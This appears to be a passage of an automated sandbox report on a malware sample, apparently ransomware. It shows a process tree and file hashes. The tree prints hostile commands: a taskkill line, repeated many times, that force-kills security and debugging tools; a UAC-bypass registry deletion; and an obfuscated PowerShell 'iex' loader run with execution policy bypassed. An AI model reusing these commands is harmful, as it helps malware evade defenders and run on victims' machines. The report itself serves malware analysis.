C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Kills process with taskkill
PID:1860
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵PID:3252
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Kills process with taskkill
PID:1600
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Kills process with taskkill
PID:1608
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵PID:3016
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵PID:4448
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵PID:5004
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Kills process with taskkill
PID:3452
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Kills process with taskkill
PID:1064
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵PID:5084
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Kills process with taskkill
PID:1948
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵PID:2608
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Kills process with taskkill
PID:4668
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Kills process with taskkill
PID:3428
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Kills process with taskkill
PID:4800
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Kills process with taskkill
PID:3704
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵PID:996
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Kills process with taskkill
PID:2340
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Kills process with taskkill
PID:4536
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵PID:4808
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Kills process with taskkill
PID:2560
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Kills process with taskkill
PID:1132
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵PID:412
-
-
-
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" delete HKCU\Software\Classes\.alecar\ /f3⤵
- Modifies registry class
- Modifies registry key
PID:3608
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" delete HKCU\Software\Classes\ms-settings\ /f3⤵
- Modifies registry class
- Modifies registry key
PID:2320
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c start C:/ProgramData/Servis_Framework3511JusU7DH87g2wWTW8l8sgH3E1KIbrDlMX2o838AIwKZ6mxVcjH4.databas3⤵
- Suspicious use of WriteProcessMemory
PID:3608 -
C:\ProgramData\Servis_Framework3511JusU7DH87g2wWTW8l8sgH3E1KIbrDlMX2o838AIwKZ6mxVcjH4.databasC:/ProgramData/Servis_Framework3511JusU7DH87g2wWTW8l8sgH3E1KIbrDlMX2o838AIwKZ6mxVcjH4.databas4⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:2112 -
C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRsHeLl.exePoWeRsHeLl Remove-Item C:/ProgramData/SecureConnectionTunnel.ps15⤵
- Suspicious behavior: EnumeratesProcesses
PID:4424
-
-
C:\ProgramData\DefendSecurity\SystemSettings.SecurityC:\ProgramData\DefendSecurity\SystemSettings.Security -ExEc Bypass -Command "& {&('i'+'ex') (gc -Raw -Path 'C:\pRogRaMdatA\lH6gEw462770nr1F7u0UreGjd00tSTq06Bu1TNUVU8DHmb4TtL9TmS7H2.brk')}"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4888
-
-
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:3184
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4672 -
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Public\Music\SystemProcessHost.SystemProcesses2⤵
- Opens file in notepad (likely ransom note)
PID:396
-
-
C:\Users\Public\Music\SystemProcessHost.SystemProcesses.exe"C:\Users\Public\Music\SystemProcessHost.SystemProcesses.exe"1⤵
- Executes dropped EXE
PID:2804
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\ProgramData\VipPassword.txt1⤵
- Opens file in notepad (likely ransom note)
PID:4712
-
C:\ProgramData\Servis_Framework3511JusU7DH87g2wWTW8l8sgH3E1KIbrDlMX2o838AIwKZ6mxVcjH4.databas.exe"C:\ProgramData\Servis_Framework3511JusU7DH87g2wWTW8l8sgH3E1KIbrDlMX2o838AIwKZ6mxVcjH4.databas.exe"1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:1892 -
C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRsHeLl.exePoWeRsHeLl Remove-Item C:/ProgramData/SecureConnectionTunnel.ps12⤵
- Suspicious behavior: EnumeratesProcesses
PID:1032
-
-
C:\ProgramData\DefendSecurity\SystemSettings.SecurityC:\ProgramData\DefendSecurity\SystemSettings.Security -ExEc Bypass -Command "& {&('i'+'ex') (gc -Raw -Path 'C:\pRogRaMdatA\lH6gEw462770nr1F7u0UreGjd00tSTq06Bu1TNUVU8DHmb4TtL9TmS7H2.brk')}"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3428
-
-
C:\ProgramData\DefendSecurity\SystemSettings.Security.exe"C:\ProgramData\DefendSecurity\SystemSettings.Security.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4208
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
Filesize
21B
MD5025f05f1bfe43214b5b56139a528db2b
SHA16aac59ae2b474aedd4773c170d2a4685a0aee65d
SHA2567e3b7a5ee2f8b0bb96d2e729b7e58b06645191b9b9d550db5fa1937fa9aa6b13
SHA512a2e72695f2094e43a99991557b381f9d8d9e7252173a1792002f530b4e87e92e37b53edcafb2d9d024f81a223ec3f5457aeb1f5cf70cf5fe3fe9ad71f49bd561
-
Filesize
3KB
MD5223bd4ae02766ddc32e6145fd1a29301
SHA1900cfd6526d7e33fb4039a1cc2790ea049bc2c5b
SHA2561022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e
SHA512648cd3f8a89a18128d2b1bf960835e087a74cdbc783dbfcc712b3cb9e3a2e4f715e534ba2ef81d89af8f60d4882f6859373248c875ceb26ad0922e891f2e74cc
-
Filesize
936B
MD51d579e6ee8e4e2235f19853cb414ed06
SHA1bddc3768f6bae40416dab3400ba8717d0a5b0749
SHA256c78def9996a956bdc57f9c165b1eeaba75ac25a80ee069087edcb61a2afac820
SHA512f23a382f809786a825f71508b1b86f6c6db802f5982249323a4208d8301e4e593ed01e3291a763ebeaf025829e828005ed3dfd2460df8c46f3ff95e641c44aa3
-
Filesize
1KB
MD533a5582d19d967ee5af5e4faf5b470cd
SHA1232581ae8550d0bd670e409610aeb831f7d95a08
SHA25647540bf52bad88f132411bc67d473caecedc3bf329434f006b54710492019405
SHA512cf064ede82004ac51abfbd9190cf77d3c71438ec3d6759b50e9cb33a18c4ebe79c450bcbf083427dac31cafcf10a366e92c9496cc24ef92e8680cedf4f230d1a
-
Filesize
1KB
MD57482b92b6453d84869e4a87c00ee0600
SHA1bb675585a72f659c1dc8518916ee1ce7635dea64
SHA2566f899f24bd42ee33c3b83fbc16d9396eac7455f45bcd24949e746efc48b46e18
SHA512bd44183d14dd371ecd6afff9c1d04d43dd77246de4178b61579a9754a04620e4f8d6b833f28919072dc3cad222f6866658f9f08e225c195abca9d9e196b0725a
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
537KB
MD5461f29adf1c3ec76588235194e13bdcd
SHA176cf092bf81a01d0709ba1efa66b9e5907315305
SHA256f234befba70f313b7ff602c9b4fd52eedc05d5ef316967c1554a497b3f62f612
SHA512be294ccef508ff3745d3641d37c95f159a2aed5072fa0266573335b83aa4e4f2f293f71b5203e8c38a0f206816723905a3f7f192ec2e7778767e8d8eead99451
-
Filesize
73KB
MD547b2f35c5fc5395e4926b4bf47739c57
SHA1e02646b382b384ef9815a4a0af8347246e34e8ce
SHA256cf484e3d44093c29bd689e81553ebe7f182249a4f4bfb5453c177408df6502fb
SHA5123b3cf11806fb8b12b99b58ea4b74f342abffc0d9afe3cfc601b0875b15ff5eb8105830c6dc56f222ec4b0b98681fbe67a1494b4472478c58ba1934ee750d4b00